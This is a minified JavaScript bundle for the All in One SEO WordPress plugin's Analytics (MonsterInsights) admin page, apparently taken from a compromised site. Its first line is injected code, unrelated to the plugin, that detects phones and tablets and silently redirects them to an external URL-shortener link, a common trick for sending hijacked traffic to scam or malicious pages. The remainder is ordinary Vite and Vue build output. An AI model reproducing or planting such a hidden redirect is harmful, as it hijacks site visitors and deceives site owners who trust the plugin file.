(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=[window.__aioseoDynamicImportPreload__("js/Main.9494b52b.js"),window.__aioseoDynamicImportPreload__("js/vendor-phone.2afdf77e.js"),window.__aioseoDynamicImportPreload__("js/vendor-vue-ui.232c7c36.js"),window.__aioseoDynamicImportPreload__("js/vendor-other.39e59221.js"),window.__aioseoDynamicImportPreload__("css/vendor-vue-ui.dbee72c8.css"),window.__aioseoDynamicImportPreload__("css/vendor-phone.bcf692fa.css"),window.__aioseoDynamicImportPreload__("js/Index.66db1786.js"),window.__aioseoDynamicImportPreload__("js/app-core.c8323d51.js"),window.__aioseoDynamicImportPreload__("js/vendor-lodash.03129cfe.js"),window.__aioseoDynamicImportPreload__("js/Tabs.ea329423.js"),window.__aioseoDynamicImportPreload__("js/Button.3cec2279.js"),window.__aioseoDynamicImportPreload__("js/_plugin-vue_export-helper.eefbdd86.js"),window.__aioseoDynamicImportPreload__("css/Button.2bf1deff.css"),window.__aioseoDynamicImportPreload__("js/ProBadge.7b829f47.js"),window.__aioseoDynamicImportPreload__("css/ProBadge.6500bcec.css"),window.__aioseoDynamicImportPreload__("js/Caret.aae02d8a.js"),window.__aioseoDynamicImportPreload__("js/Information.6ccba108.js"),window.__aioseoDynamicImportPreload__("js/Slide.f2114d9d.js"),window.__aioseoDynamicImportPreload__("css/Tabs.d9e8b805.css"),window.__aioseoDynamicImportPreload__("js/Index.b9859662.js"),window.__aioseoDynamicImportPreload__("js/Close.7fb523c8.js"),window.__aioseoDynamicImportPreload__("css/Index.74bb20a6.css"),window.__aioseoDynamicImportPreload__("js/Header.d2cbe877.js"),window.__aioseoDynamicImportPreload__("js/ScrollAndHighlight.5271fbff.js"),window.__aioseoDynamicImportPreload__("js/ScrollTo.f4df02aa.js"),window.__aioseoDynamicImportPreload__("js/LicenseKeyBar.0038e5e6.js"),window.__aioseoDynamicImportPreload__("js/LogoGear.93a225a7.js"),window.__aioseoDynamicImportPreload__("css/LicenseKeyBar.1c15fc37.css"),window.__aioseoDynamicImportPreload__("js/AnimatedNumber.f33b2226.js"),window.__aioseoDynamicImportPreload__("js/Logo.a4a419c3.js"),window.__aioseoDynamicImportPreload__("js/Trash.47f6fc0e.js"),window.__aioseoDynamicImportPreload__("css/Header.e8442b6b.css"),window.__aioseoDynamicImportPreload__("js/Support.d3586703.js"),window.__aioseoDynamicImportPreload__("js/Url.535116f6.js"),window.__aioseoDynamicImportPreload__("js/Pencil.683baab8.js"),window.__aioseoDynamicImportPreload__("js/Exclamation.179e5969.js"),window.__aioseoDynamicImportPreload__("js/Gear.1a6546a3.js"),window.__aioseoDynamicImportPreload__("css/Index.b249bc29.css"),window.__aioseoDynamicImportPreload__("css/main.7ed77203.css"),window.__aioseoDynamicImportPreload__("js/Monsterinsights.ad0199b6.js"),window.__aioseoDynamicImportPreload__("js/MiIntro.00c3ab61.js"),window.__aioseoDynamicImportPreload__("js/Card.9ee06a3e.js"),window.__aioseoDynamicImportPreload__("js/Tooltip.569a23d9.js"),window.__aioseoDynamicImportPreload__("css/Tooltip.497e84ea.css"),window.__aioseoDynamicImportPreload__("css/Card.8b7603da.css"),window.__aioseoDynamicImportPreload__("js/em.7625294c.js"),window.__aioseoDynamicImportPreload__("css/MiIntro.7ca85fe8.css"),window.__aioseoDynamicImportPreload__("js/External.071520c9.js"),window.__aioseoDynamicImportPreload__("css/Monsterinsights.b2d94e10.css")])))=>i.map(i=>d[i]);
import{aq as a,f as s,i,a0 as p,an as m}from"./js/vendor-vue-ui.232c7c36.js";import{l as c}from"./js/index.98d01501.js";import{l as _}from"./js/index.2a5d16ad.js";import{l}from"./js/index.0d80c2c2.js";import{l as u}from"./js/app-core.c8323d51.js";import{_ as f}from"./js/_plugin-vue_export-helper.eefbdd86.js";import{_ as d,s as v}from"./js/dynamic-import-helper.c518af60.js";import{_ as n}from"./js/vendor-phone.2afdf77e.js";import{_ as g}from"./js/vendor-other.39e59221.js";import"./js/Button.3cec2279.js";import"./js/Input.af9b9f81.js";import"./js/Index.b9859662.js";import"./js/Close.7fb523c8.js";import"./js/Pencil.683baab8.js";import"./js/Trash.47f6fc0e.js";import"./js/Select.415eaf8e.js";import"./js/Caret.aae02d8a.js";import"./js/Toggle.29e2980f.js";import"./js/vendor-lodash.03129cfe.js";const h={},y={class:"aioseo-app"};function A(r,M){const e=a("router-view");return s(),i("div",y,[p(e)])}const P=f(h,[["render",A]]),w="all-in-one-seo-pack",x=r=>()=>d(Object.assign({"../views/Main.vue":()=>n(()=>import("./js/Main.9494b52b.js"),__vite__mapDeps([0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38]),import.meta.url),"../views/Monsterinsights.vue":()=>n(()=>import("./js/Monsterinsights.ad0199b6.js"),__vite__mapDeps([39,7,2,3,4,8,40,41,42,11,43,15,30,20,17,44,26,34,45,46,47,48]),import.meta.url)}),`../views/${r}.vue`,3),E=[{path:"/:pathMatch(.*)*",redirect:"/"},{path:"/",name:"monsterinsights",component:x("Main"),meta:{access:"aioseo_manage_seo",name:g("Analytics",w)}}];let o=m({...P,name:"Pages/MonsterInsights"});o=c(o);o=_(o);o=l(o);const t=v(E,o);t.app=o;o.use(t);u(o,t);o.mount("#aioseo-app");
